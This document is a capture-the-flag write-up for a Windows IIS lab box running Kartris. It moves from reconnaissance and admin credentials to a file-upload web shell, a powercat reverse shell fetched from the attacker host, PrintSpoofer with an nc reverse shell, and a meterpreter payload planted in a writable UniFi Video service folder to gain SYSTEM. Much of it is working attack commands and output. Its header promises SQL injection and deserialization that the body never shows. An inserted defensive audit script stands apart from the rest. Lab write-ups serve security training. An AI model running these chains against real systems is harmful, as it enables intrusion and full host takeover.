# VHL — Trace

Web · Medium · Windows

IIS 10.0 running Kartris eCommerce on Windows. SQL injection and .NET deserialization chain leads to code execution and privilege escalation.

February 15, 2025 · Virtual Hacking Labs

#IIS #Kartris #SQLi #Deserialization
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.235
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 17 disallowed entries (15 shown)
| /Admin/*.* /Protected/*.* /Uploads/*.* /Checkout.aspx
| /CheckoutComplete.aspx /CheckoutProcess.aspx /Callback.aspx /Error.aspx
| /Customer.aspx /CustomerAccount.aspx /CustomerAffiliates.aspx
| /CustomerDetails.aspx /CustomerInvoice.aspx /CustomerTickets.aspx
|_/CustomerViewOrder.aspx
| http-title: Kartris
|_Requested resource was /Default.aspx
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
1935/tcp open rtmp?
6666/tcp open irc?
|_irc-info: Unable to open connection
7080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: UniFi Video
|_http-server-header: Apache-Coyote/1.1
7443/tcp open ssl/http Apache Tomcat/Coyote JSP engine 1.1
| ssl-cert: Subject: commonName=10.11.1.235/organizationName=ubnt.com/stateOrProvinceName=CA/countryName=US
| Not valid before: 2018-05-01T08:01:53
|_Not valid after: 2028-04-28T08:01:53
|_http-title: UniFi Video
|_ssl-date: 2025-02-14T04:20:08+00:00; 0s from scanner time.
|_http-server-header: Apache-Coyote/1.1
7445/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 404 Not found
| Server: EvoStream Media Server (www.evostream.com)
| Content-Type: application/octet-stream
| Access-Control-Allow-Origin: *
|_ Content-Length: 0
7446/tcp open ssl/unknown
| ssl-cert: Subject: commonName=10.11.1.235/organizationName=ubnt.com/stateOrProvinceName=CA/countryName=US
| Not valid before: 2018-05-01T08:01:53
|_Not valid after: 2028-04-28T08:01:53
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 404 Not found
| Server: EvoStream Media Server (www.evostream.com)
| Content-Type: application/octet-stream
| Access-Control-Allow-Origin: *
|_ Content-Length: 0
7447/tcp open unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2019 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 18.49 ms 10.11.1.235
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 281.64 seconds
```

## 80

```sh
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 17 disallowed entries (15 shown)
| /Admin/*.* /Protected/*.* /Uploads/*.* /Checkout.aspx
| /CheckoutComplete.aspx /CheckoutProcess.aspx /Callback.aspx /Error.aspx
| /Customer.aspx /CustomerAccount.aspx /CustomerAffiliates.aspx
| /CustomerDetails.aspx /CustomerInvoice.aspx /CustomerTickets.aspx
|_/CustomerViewOrder.aspx
| http-title: Kartris
|_Requested resource was /Default.aspx
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
```

## directory search

```sh
dirsearch -u http://10.11.1.235/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Trace/reports/http_10.11.1.235/__25-02-14_00-01-28.txt
Target: http://10.11.1.235/
[00:01:28] Starting:
[00:01:28] 403 - 312B - /%2e%2e//google.com
[00:01:28] 200 - 1KB - /%3f/
[00:01:29] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:01:29] 404 - 1KB - /.asmx
[00:01:29] 404 - 1KB - /.ashx
[00:01:33] 302 - 139B - /;/admin -> /;/Admin/_Default.aspx
[00:01:33] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:01:35] 302 - 137B - /ADMIN -> /Admin/_Default.aspx
[00:01:35] 404 - 1KB - /admin%20/
[00:01:35] 302 - 137B - /Admin -> /Admin/_Default.aspx
[00:01:35] 302 - 137B - /admin -> /Admin/_Default.aspx
[00:01:35] 500 - 2KB - /admin.
[00:01:35] 302 - 137B - /Admin/ -> /Admin/_Default.aspx
[00:01:35] 302 - 137B - /admin/ -> /Admin/_Default.aspx
[00:01:35] 302 - 157B - /admin/admin -> /Admin/_Default.aspx/Admin/_Default.aspx
[00:01:36] 302 - 162B - /admin_area/admin -> /Admin/_Default.aspx_area/Admin/_Default.aspx
[00:01:39] 302 - 151B - /administrator/admin/ -> /administrator/Admin/_Default.aspx
[00:01:41] 302 - 145B - /article/admin -> /article/Admin/_Default.aspx
[00:01:41] 500 - 2KB - /asset..
[00:01:41] 302 - 142B - /auth/admin -> /auth/Admin/_Default.aspx
[00:01:42] 302 - 146B - /bb-admin/admin -> /bb-admin/Admin/_Default.aspx
[00:01:43] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:01:45] 302 - 148B - /confluence/admin -> /confluence/Admin/_Default.aspx
[00:01:45] 200 - 40KB - /contact.aspx
[00:01:46] 200 - 49KB - /default.aspx
[00:01:46] 200 - 1KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[00:01:47] 302 - 140B - /en/admin/ -> /en/Admin/_Default.aspx
[00:01:47] 200 - 1KB - /error.aspx
[00:01:48] 200 - 31KB - /favicon.ico
[00:01:49] 302 - 143B - /forum/admin/ -> /forum/Admin/_Default.aspx
[00:01:50] 302 - 140B - /gs/admin -> /gs/Admin/_Default.aspx
[00:01:50] 301 - 149B - /images -> http://10.11.1.235/images/
[00:01:50] 200 - 25KB - /image.aspx
[00:01:51] 500 - 2KB - /index.php.
[00:01:51] 200 - 1KB - /index.php::$DATA
[00:01:51] 301 - 153B - /javascript -> http://10.11.1.235/javascript/
[00:01:52] 500 - 2KB - /javax.faces.resource.../
[00:01:52] 500 - 2KB - /javax.faces.resource.../WEB-INF/web.xml.jsf
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[00:01:52] 200 - 1KB - /jolokia/exec/java.lang:type=Memory/gc
[00:01:52] 200 - 1KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[00:01:52] 200 - 1KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[00:01:52] 200 - 1KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[00:01:52] 200 - 1KB - /jolokia/search/*:j2eeType=J2EEServer,*
[00:01:53] 302 - 143B - /login/admin/ -> /login/Admin/_Default.aspx
[00:01:53] 404 - 1KB - /login.wdm%20
[00:01:53] 500 - 2KB - /login.wdm%2e
[00:01:55] 302 - 147B - /moderator/admin -> /moderator/Admin/_Default.aspx
[00:01:55] 302 - 145B - /modules/admin/ -> /modules/Admin/_Default.aspx
[00:01:55] 302 - 143B - /mysql/admin/ -> /mysql/Admin/_Default.aspx
[00:01:56] 200 - 30KB - /news.aspx
[00:01:57] 302 - 143B - /pages/admin/ -> /pages/Admin/_Default.aspx
[00:01:59] 301 - 150B - /plugins -> http://10.11.1.235/plugins/
[00:02:05] 500 - 2KB - /rating_over.
[00:02:06] 200 - 511B - /robots.txt
[00:02:06] 200 - 1KB - /rss.aspx
[00:02:07] 200 - 34KB - /search.aspx
[00:02:07] 404 - 1KB - /service.asmx
[00:02:08] 200 - 13KB - /sitemap.xml
[00:02:09] 301 - 148B - /skins -> http://10.11.1.235/skins/
[00:02:09] 302 - 148B - /SiteServer/Admin -> /siteserver/Admin/_Default.aspx
[00:02:09] 302 - 142B - /solr/admin/ -> /solr/Admin/_Default.aspx
[00:02:09] 500 - 2KB - /static..
[00:02:12] 200 - 11KB - /Trace.axd
[00:02:12] 200 - 1KB - /Trace.axd::$DATA
[00:02:12] 404 - 1KB - /umbraco/webservices/codeEditorSave.asmx
[00:02:12] 301 - 150B - /uploads -> http://10.11.1.235/uploads/
[00:02:13] 302 - 142B - /user/admin -> /user/Admin/_Default.aspx
[00:02:13] 302 - 143B - /users/admin -> /users/Admin/_Default.aspx
[00:02:14] 500 - 2KB - /WEB-INF./
[00:02:14] 500 - 2KB - /WEB-INF./web.xml
[00:02:14] 200 - 1KB - /web.config::$DATA
[00:02:15] 404 - 1KB - /WebResource.axd?d=LER8t9aS
[00:02:15] 200 - 34KB - /wishlist.aspx
[00:02:16] 200 - 34KB - /Wishlist.aspx/Trace.axd
```

## creds

Admin:csxLX?dx

Admin portal
## Kartris 1.6 - Arbitrary File Upload

- https://www.exploit-db.com/exploits/48445

```sh
cp /usr/share/webshells/aspx/cmdasp.aspx ./
```

http://10.11.1.235/uploads/General/cmdasp.aspx

## powercat reverse shell

- serve powercat

```sh
python3 -m http.server
```

- catch the reverse shell

```sh
nc -lnvp 443
```

```sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://172.16.1.1/powercat.ps1');powercat -c 172.16.1.1 -p 443 -e cmd
```

## priv escalation

```cmd
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DESKTOP-7VGT3QE
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.16299 N/A Build 16299
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10021-83732-AA303
Original Install Date: 4/30/2018, 3:44:07 PM
System Boot Time: 2/13/2025, 9:40:35 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,071 MB
Available Physical Memory: 1,583 MB
Virtual Memory: Max Size: 4,351 MB
Virtual Memory: Available: 1,991 MB
Virtual Memory: In Use: 2,360 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4053577
[02]: KB4054517
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.11.1.235
[02]: fe80::9cb2:f835:8f7e:bb49
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

## whoami

```cmd
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```

## winpeas

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/winPEASx64.exe winPEASx64.exe
```

```cmd
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
UniFiVideoService(Ubiquiti Networks, Inc. - Ubiquiti UniFi Video)[C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService] - Auto - Running - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\ProgramData\unifi-video (Users [WriteData/CreateFiles])
Ubiquiti UniFi Video Service
=================================================================================================
```

## sharpup

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/SharpUp.exe SharpUp.exe
```

```cmd
C:\Users\Public>.\SharpUp.exe audit
.\SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
=== Modifiable Service Binaries ===
Service 'UniFiVideoService' (State: Running, StartMode: Auto) : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
[*] Completed Privesc Checks in 1 seconds
```

## SeImpersonatePrivilege

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET4.exe GodPotato-NET4.exe
```

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/PrintSpoofer64.exe PrintSpoofer64.exe
```

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/nc.exe nc.exe
```

```cmd
.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"
```

## PrintSpoofer

```cmd
C:\Users\Public>.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"
.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
```

```cmd
nc -lnvp 80
retrying local 0.0.0.0:80 : Address already in use
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.235] 50218
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
onc5fjjdac2jdpwnpp1r
C:\Windows\system32>date
date
The current date is: Thu 02/13/2025
```

## Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation

```cmd
C:\ProgramData\unifi-video>icacls .\
icacls .\
.\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
```

```sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.1.1 LPORT=80 -f exe > taskkill.exe
```

- transfer the payload

```sh
python3 -m http.server 8000
```

```cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1:8000/taskkill.exe taskkill.exe
```

```cmd
C:\ProgramData\unifi-video>dir
dir
Volume in drive C has no label.
Volume Serial Number is 46AC-CBC0
Directory of C:\ProgramData\unifi-video
02/13/2025 10:37 PM <DIR> .
02/13/2025 10:37 PM <DIR> ..
07/26/2017 02:10 PM 219,136 avService.exe
05/01/2018 12:00 AM <DIR> bin
05/01/2018 12:01 AM <DIR> conf
05/01/2018 12:02 AM <DIR> data
05/01/2018 12:00 AM <DIR> email
05/01/2018 12:00 AM <DIR> fw
05/01/2018 02:06 AM 35,190 hs_err_pid2128.log
05/01/2018 12:00 AM <DIR> lib
02/13/2025 08:40 PM <DIR> logs
02/13/2025 10:37 PM 7,168 taskkill.exe
05/01/2018 12:00 AM 768 Ubiquiti UniFi Video.lnk
07/26/2017 02:10 PM 48,640 UniFiVideo.exe
07/26/2017 02:10 PM 32,038 UniFiVideo.ico
05/01/2018 12:00 AM 89,050 Uninstall.exe
05/01/2018 12:01 AM <DIR> webapps
05/01/2018 12:01 AM <DIR> work
7 File(s) 431,990 bytes
11 Dir(s) 10,402,410,496 bytes free
```

```cmd
C:\ProgramData\unifi-video>sc qc UniFiVideoService
sc qc UniFiVideoService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UniFiVideoService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Ubiquiti UniFi Video
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
```

```cmd
C:\ProgramData\unifi-video>sc stop UniFiVideoService
sc stop UniFiVideoService
[SC] OpenService FAILED 5:
Access is denied.
```
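The icacls and sc qc output above is the root cause in one picture: BUILTIN\Users can create files in the folder a LocalSystem service loads its binary from, and the path is unquoted. As an added example (not from the writeup or from Ubiquiti), the following PowerShell audit enumerates every service and flags those whose image directory grants write-type rights to low-privileged principals or whose unquoted path contains a space; the list of low-privileged principals is an assumption to tune per environment.

```powershell
# Added audit script (not from the writeup): flags services whose image directory is writable by
# low-privileged principals, or whose unquoted path contains a space. That is the condition shown
# above for UniFiVideoService: C:\ProgramData\unifi-video grants BUILTIN\Users WD/AD while the
# service runs as LocalSystem. Run from an elevated PowerShell on the host being audited.
# Principals treated as low-privileged (assumption; extend for your environment).
$LowPrivPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
# Rights that let a principal drop or replace files in the directory, or take control of it.
$WriteMask = [int64][System.Security.AccessControl.FileSystemRights]'WriteData,AppendData,Delete,ChangePermissions,TakeOwnership'
$GenericWriteMask = 0x50000000   # GENERIC_ALL | GENERIC_WRITE, for ACEs that store generic rights

function Get-ServiceImagePath {
    # Extract the executable from a service PathName; arguments such as //RS//Name are dropped.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) } else { return $p.Trim('"') }
    }
    # Unquoted: the image ends at the first token ending in .exe; anything after it is arguments.
    $m = [regex]::Match($p, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value } else { return ($p -split '\s+')[0] }
}

function Get-LowPrivWriteAces {
    # Return the Allow ACEs on $Directory that give a low-privileged principal write-type rights.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return @() }
    $hits = @()
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = ([int64][int]$ace.FileSystemRights) -band 0xFFFFFFFF
        if ((($rights -band $WriteMask) -ne 0) -or (($rights -band $GenericWriteMask) -ne 0)) {
            $hits += "$($ace.IdentityReference.Value) [$($ace.FileSystemRights)]"
        }
    }
    return $hits
}

function Get-WeakServiceBinaries {
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceImagePath $svc.PathName
        if (-not $exe) { continue }
        $dir = Split-Path -Path $exe -Parent -ErrorAction SilentlyContinue
        if (-not $dir) { continue }
        $unquoted = ($svc.PathName.Trim() -notmatch '^"') -and ($exe -match '\s')
        $writable = @(Get-LowPrivWriteAces -Directory $dir)
        if ($unquoted -or $writable.Count -gt 0) {
            $findings += [pscustomobject]@{
                Service = $svc.Name; StartMode = $svc.StartMode; RunsAs = $svc.StartName
                Binary = $exe; UnquotedWithSpace = $unquoted; WritableBy = ($writable -join '; ')
            }
        }
    }
    return $findings
}

Get-WeakServiceBinaries | Format-Table -AutoSize
```

On the host above this reports UniFiVideoService with RunsAs LocalSystem and WritableBy listing BUILTIN\Users; the fix is to move the service binary under a directory that only Administrators can write to (or strip the Users write ACE) and to quote the image path.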
```sh
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 172.16.1.1
msf6 exploit(multi/handler) > set lport 80
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
```

```cmd
C:\ProgramData\unifi-video>shutdown /r /t 0
```

```sh
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.16.1.1:80
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Staging x64 payload (204892 bytes) ...
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.16.1.1:80 -> 10.11.1.235:49700) at 2025-02-14 01:51:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1988 created.
Channel 1 created.
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\ProgramData\unifi-video>whoami
whoami
nt authority\system
C:\ProgramData\unifi-video>type C:\users\administrators\desktop\key.txt
type C:\users\administrators\desktop\key.txt
The system cannot find the path specified.
C:\ProgramData\unifi-video>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
onc5fjjdac2jdpwnpp1r
C:\ProgramData\unifi-video>date
date
The current date is: Thu 02/13/2025
```